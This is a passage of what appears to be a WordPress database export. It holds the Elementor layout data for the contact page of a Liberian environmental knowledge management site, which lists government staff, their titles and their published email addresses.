href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23168,3353,'_elementor_edit_mode','builder'),(23169,3353,'_elementor_template_type','wp-page'),(23170,3353,'_elementor_version','3.0.16'),(23171,3353,'_wp_page_template','default'),(23172,3353,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isI